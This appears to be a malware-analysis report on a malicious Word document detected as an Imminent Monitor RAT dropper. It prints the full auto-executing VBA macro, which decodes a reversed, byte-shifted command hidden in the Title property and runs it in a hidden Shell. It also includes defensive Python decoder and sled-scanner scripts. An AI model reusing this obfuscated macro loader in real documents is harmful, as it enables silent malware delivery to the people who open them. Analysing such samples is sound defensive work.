Verdict: MALICIOUS (risk score 250)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample contains a VBA macro in ThisDocument that runs from Document_Open, i.e. as soon as the document is opened with macros enabled. The macro reads the document's built-in Title property (the property name is assembled as "T" + "it" + "le" to defeat naive string matching), reverses it with StrReverse, converts it to an ANSI byte array with StrConv(..., vbFromUnicode), subtracts 7 from every byte, and converts the bytes back to a string. The decoded string is a "|"-separated configuration: field 0 is a substitution token and field 1 is a command template. The macro replaces every occurrence of the token in the template with "." (so dots, and therefore file extensions or host names, never appear in the stored config), replaces the placeholder FPATH with the full path of the open document (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name), and passes the result to Shell(..., 0), where 0 is vbHide, so the spawned process has no visible window. The Title value itself is not reproduced in this report, so the exact command cannot be recovered from the macro source alone; what the FPATH substitution does establish is that the command references the document file itself, which fits a dropper that either carves a payload out of the .doc or uses it as input to a downloader stage. The ClamAV name Doc.Dropper.ImminentMonitorRAT labels the sample as a dropper for the Imminent Monitor RAT. The p-code disassembly appended to the extracted script shows the same operation sequence (StrReverse, StrConv, subtract 7, Split/Replace, Shell) under different local variable names (GY, Og, rp, zs, Rw), so the compiled code Word actually executes matches the visible source; this is the comparison to make when ruling out VBA stomping.
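The decoding chain above, reimplemented in Python as an added example (this is not the analyzer's code and not part of the report). Because the sample's real Title value is not included in the report, the script builds a constructed Title with the inverse transform and then decodes it; the document path, the token "ZZ" and the command text are all invented for illustration. StrConv's ANSI conversion is modelled as Latin-1 (one byte per character), which matches Windows cp1252 except in the 0x80-0x9F range, and the olefile-based property reader is included for use on a real file but is not exercised offline.

```python
"""Decoder for the macro's Title-property configuration (added example, not from the report).

Mirrors the VBA chain: StrReverse -> StrConv(vbFromUnicode) -> byte minus 7 -> StrConv(vbUnicode)
-> Split on "|" -> Replace(token, ".") -> Replace("FPATH", document path) -> Shell.
"""

SEPARATOR = "|"        # Chr(124) in the macro
DOT = "."              # Chr(46) in the macro
PLACEHOLDER = "FPATH"  # "FP" + "ATH" in the macro
SHIFT = 7              # the macro subtracts 7 from every byte

# Assumption: StrConv(..., vbFromUnicode) uses the system ANSI code page; Latin-1 is used here
# so that every byte value round-trips (cp1252 differs only in 0x80-0x9F).
ANSI = "latin-1"


def decode_title(title: str) -> str:
    """Undo the reversal and the per-byte shift; returns the 'token|template' config string."""
    raw = title[::-1].encode(ANSI)            # StrReverse, then Unicode -> ANSI bytes
    out = bytearray()
    for b in raw:
        if b < SHIFT:
            # VBA stores zs(rp) - 7 back into a Byte; a negative result raises "Overflow",
            # so a working sample never contains such bytes. Fail loudly rather than wrap.
            raise ValueError(f"byte 0x{b:02x} cannot be shifted down by {SHIFT}")
        out.append(b - SHIFT)
    return out.decode(ANSI)                   # StrConv(..., vbUnicode)


def build_command(config: str, doc_path: str) -> str:
    """Reproduce the string the macro hands to Shell(..., 0)."""
    fields = config.split(SEPARATOR)
    if len(fields) < 2:
        raise ValueError("config has no '|' separator; Split(...)(1) would raise in VBA")
    token, template = fields[0], fields[1]
    # VBA's Replace() with an empty find string returns the input unchanged; Python's
    # str.replace("", ".") would insert dots between every character, so special-case it.
    cmd = template.replace(token, DOT) if token else template
    return cmd.replace(PLACEHOLDER, doc_path)


def encode_title(command: str, token: str) -> str:
    """Inverse transform; used only to build the constructed sample below."""
    plain = f"{token}{SEPARATOR}{command}".encode(ANSI)
    return bytes(b + SHIFT for b in plain).decode(ANSI)[::-1]


def read_title(doc_path: str) -> str:
    """Read the built-in Title property from a real .doc with olefile (not run offline)."""
    import olefile  # third-party; installed together with oletools
    with olefile.OleFileIO(doc_path) as ole:
        meta = ole.get_metadata()
        title = meta.title or b""
        codepage = f"cp{meta.codepage}" if meta.codepage else ANSI
    return title.decode(codepage) if isinstance(title, bytes) else title


if __name__ == "__main__":
    # Constructed sample: the real Title value is not reproduced in the report.
    doc = r"C:\Users\victim\Desktop\invoice.doc"
    sample_title = encode_title("cmd /c echo FPATH > outZZtxt", "ZZ")
    config = decode_title(sample_title)
    print("stored Title  :", repr(sample_title))
    print("decoded config:", config)
    print("shell command :", build_command(config, doc))
```

On a real sample, run `read_title()` on the .doc, feed the result to `decode_title()`, and pass the decoded config plus the path the victim would have opened the file from to `build_command()`; the output is the exact command line Shell() would have executed, without ever enabling the macro.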
Heuristics (8)

- ClamAV: Doc.Dropper.ImminentMonitorRAT-10018167-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.ImminentMonitorRAT-10018167-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
  Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL
  Matched lines in script:
  Rw = StrConv(zs, vbUnicode)
  Shell (Replace(Replace(Split(Rw, Chr(124))(1), Split(Rw, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
  End Sub
- VBA reads reversed config from document properties [high] OLE_VBA_REVERSED_DOCPROP_CONFIG
  VBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source, an obfuscation technique used by the SVCReady loader.
  Matched lines in script:
  Dim fT As String
  fT = StrReverse(ThisDocument.BuiltInDocumentProperties("T" + "it" + "le"))
  zs = StrConv(fT, vbFromUnicode)
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN
  Matched lines in script:
  Attribute VB_Customizable = True
  Private Sub Document_Open()
  Dim zs() As Byte
- NOP-equivalent sled detected [medium] SC_NOP_EQUIV_SLED
  Long run of 0x61 bytes. Attempted x86 opcode disassembly decodes the run as 96 consecutive popal (0x61) instructions at file offsets 0x00019708 through 0x00019767.
  Caveat: 0x61 is ASCII 'a', and several other single-byte NOP-equivalents are printable as well (0x41-0x4F, the 32-bit inc/dec opcodes, are 'A'-'O'), so a run like this inside an Office document is at least as likely to be text or padding as a shellcode sled. No shellcode-like code following the run is shown in this report, so treat this finding as weak corroboration of the macro findings, not as evidence of an exploit.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eight URLs below were found in document text (OLE body):
  http://ns.adobe.com/xap/1.0/
  http://www.w3.org/1999/02/22-rdf-syntax-ns#
  http://ns.adobe.com/photoshop/1.0/
  http://purl.org/dc/elements/1.1/
  http://ns.adobe.com/xap/1.0/mm/
  http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  http://schemas.openxmlformats.org/drawingml/2006/main
  These are XML namespace identifiers (Adobe XMP, Photoshop, RDF, Dublin Core and OOXML DrawingML) carried in the metadata of an embedded image and in drawing markup. They are schema names, not hosts the sample contacts, and are not indicators of compromise; none of them is referenced from the macro.
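The SC_NOP_EQUIV_SLED heuristic above, reimplemented in Python as an added example (not the analyzer's code), with the false-positive handling a practitioner wants: every hit is flagged as printable or not, since most single-byte NOP-equivalents are ASCII letters. The opcode table is the common 32-bit x86 set and the sample buffer is constructed to mirror the finding (96 'a' bytes between zero padding); offsets and input are invented.

```python
"""Single-byte NOP-equivalent sled scanner (added example, not the analyzer's code)."""

# Single-byte x86 (32-bit) opcodes commonly used as sled filler because they do not
# disturb execution flow: nop, inc/dec r32, pushal/popal, flag and sign-extension ops.
REGS = "eax ecx edx ebx esp ebp esi edi".split()
NOP_EQUIV = {
    0x90: "nop",
    0x60: "pushal", 0x61: "popal",
    0x98: "cwde", 0x99: "cdq", 0x9B: "fwait",
    0xF8: "clc", 0xF9: "stc", 0xFC: "cld", 0xFD: "std",
}
NOP_EQUIV.update({0x40 + i: f"inc {r}" for i, r in enumerate(REGS)})
NOP_EQUIV.update({0x48 + i: f"dec {r}" for i, r in enumerate(REGS)})


def find_sleds(buf: bytes, min_run: int = 64) -> list:
    """Return every run of at least min_run identical NOP-equivalent bytes in buf.

    Each hit carries a 'printable' flag: 0x41-0x4F are 'A'-'O' and 0x61 is 'a', so a
    printable hit inside a document is as likely to be text or padding as shellcode and
    needs confirmation from what follows the run (decoder stub, API hashes, a jump).
    """
    hits = []
    i, n = 0, len(buf)
    while i < n:
        b = buf[i]
        j = i + 1
        while j < n and buf[j] == b:       # extend the run of identical bytes
            j += 1
        run = j - i
        if b in NOP_EQUIV and run >= min_run:
            hits.append({
                "offset": i,
                "opcode": b,
                "mnemonic": NOP_EQUIV[b],
                "length": run,
                "printable": 0x20 <= b < 0x7F,
            })
        i = j
    return hits


def describe(hit: dict) -> str:
    """One-line finding in the report's style, with the printable caveat attached."""
    end = hit["offset"] + hit["length"] - 1
    kind = "printable ASCII, possibly text" if hit["printable"] else "non-printable"
    return (f"{hit['length']} x 0x{hit['opcode']:02x} ({hit['mnemonic']}) at "
            f"0x{hit['offset']:08X}-0x{end:08X} [{kind}]")


if __name__ == "__main__":
    # Constructed buffer: 96 'a' bytes surrounded by zeros, like the finding above.
    sample = b"\x00" * 16 + b"a" * 96 + b"\x00" * 16
    for h in find_sleds(sample):
        print(describe(h))
```

Run `find_sleds()` over the raw file (or over each OLE stream separately, so offsets are meaningful) and down-weight any hit with `printable` set unless the bytes after the run disassemble to something that uses the sled.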
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2517 bytes | 62873350e7fa853024fe1a1ef31f70b4783e19f4ab0244cd27ac2ac236bc66d5 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()              ' auto-executes when the document is opened
Dim zs() As Byte
Dim Rw, Og As String                     ' only Og is typed String; Rw is Variant
Dim rp As Long
Dim fT As String
' config is stored reversed in the built-in Title property; the property name is split to evade string matching
fT = StrReverse(ThisDocument.BuiltInDocumentProperties("T" + "it" + "le"))
zs = StrConv(fT, vbFromUnicode)          ' Unicode string -> ANSI byte array
For rp = 0 To UBound(zs)
zs(rp) = zs(rp) - 7                      ' subtract 7 from every byte
Next rp
Rw = StrConv(zs, vbUnicode)              ' bytes -> string; layout is token|command-template
' Chr(124) = "|", Chr(46) = ".": the token (field 0) is swapped for "." in the template (field 1),
' then FPATH is replaced with the full path of this document; window style 0 = vbHide
Shell (Replace(Replace(Split(Rw, Chr(124))(1), Split(Rw, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub
' Processing file: /tmp/qstore_7j4g88ze
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3960 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Dim
' VarDefn GY (As Byte)
' Line #2:
' Dim
' VarDefn zs
' VarDefn Rw (As String)
' Line #3:
' Dim
' VarDefn Og (As Long)
' Line #4:
' Dim
' VarDefn rp (As String)
' Line #5:
' LitStr 0x0001 "T"
' LitStr 0x0002 "it"
' Add
' LitStr 0x0002 "le"
' Add
' Ld ThisDocument
' ArgsMemLd BuiltInDocumentProperties 0x0001
' ArgsLd StrReverse 0x0001
' St rp
' Line #6:
' Ld rp
' Ld vbFromUnicode
' ArgsLd StrConv 0x0002
' St GY
' Line #7:
' StartForVariable
' Ld Og
' EndForVariable
' LitDI2 0x0000
' Ld GY
' FnUBound 0x0000
' For
' Line #8:
' Ld Og
' ArgsLd GY 0x0001
' LitDI2 0x0007
' Sub
' Ld Og
' ArgsSt GY 0x0001
' Line #9:
' StartForVariable
' Ld Og
' EndForVariable
' NextVar
' Line #10:
' Ld GY
' Ld vbUnicode
' ArgsLd StrConv 0x0002
' St zs
' Line #11:
' LitDI2 0x0001
' Ld zs
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x0000
' Ld zs
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' ArgsLd Replace 0x0003
' LitStr 0x0002 "FP"
' LitStr 0x0003 "ATH"
' Add
' Ld ActiveDocument
' MemLd Path
' Ld Application
' MemLd PathSeparator
' Concat
' Ld ActiveDocument
' MemLd Name
' Concat
' ArgsLd Replace 0x0003
' Paren
' LitDI2 0x0000
' ArgsCall Shell 0x0002
' Line #12:
' EndSub